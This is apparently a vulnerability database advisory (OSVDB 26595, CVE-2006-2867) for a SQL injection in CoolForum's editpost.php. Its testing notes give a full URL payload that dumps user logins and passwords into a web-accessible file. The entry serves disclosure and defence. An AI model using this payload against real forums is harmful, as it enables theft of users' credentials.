CoolForum editpost.php post Variable SQL Injection

2006-06-03T02:56:55
ID OSVDB:26595
Type osvdb
Reporter OSVDB
Modified 2006-06-03T02:56:55

Description

Manual Testing Notes

http://[target]/editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

References:

Other Advisory URL: http://mgsdl.free.fr/advisories/coolforum083ba.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0749.html CVE-2006-2867 Bugtraq ID: 18268